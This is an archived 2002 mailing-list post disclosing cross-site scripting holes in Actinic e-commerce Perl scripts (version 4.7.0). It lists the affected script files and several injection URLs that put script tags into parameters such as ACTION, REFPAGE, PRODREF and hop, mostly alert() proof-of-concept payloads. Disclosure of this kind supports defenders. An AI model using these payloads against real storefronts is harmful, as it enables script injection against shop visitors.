Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Holes in Actinic E-commerce services.

From: "Frog Man" <leseulfrog () hotmail com>
Date: Wed, 06 Feb 2002 16:00:27 +0100
http://www.actinic.com
http://www.actinic.co.uk/
http://www.actinic-europe.com/
Versions :
4.7.0 & -


With the files :
bb|000|001|.pl
ca|   |002|
os|   |003|
sh|   |004|
ss|   |005|
 |   |006|
 |   |007|
 |   |009|
 |   |010|
 |   |011|
 |   |012|
 |   |020|
 |   |036|
 |   |045|
 |   |046|
 |   |137|
 |   |143|
 |   |410|
referrer.pl

**000***.pl?<script>alert('CSS')</script>


and :

/ca000007.pl?ACTION=SHOWCART&REFPAGE=">[ ANYSCRIPT ]
/ss000007.pl?PRODREF=<--SCRIPT-->
/ca000001.pl?ACTION=SHOWCART&hop="><script>alert('HoP!')</script>&PATH=acatalog%2f
http://www.host.com/ss000007.pl?REFPAGE=http%3A%2F%2Fwere.to.go&PREVQUERY=ACTION%3DSHOWCART&SS=yiiiihaaaaa&PR=-1&TB=A&SHOP=


More details in french :
http://www.bal-team.t2u.com/Tuts/actinic.txt

frog-m@n



_________________________________________________________________
Discutez en ligne avec vos amis, essayez MSN Messenger : http://messenger.msn.fr/
Previous By Date Next
Previous By Thread Next

Current thread: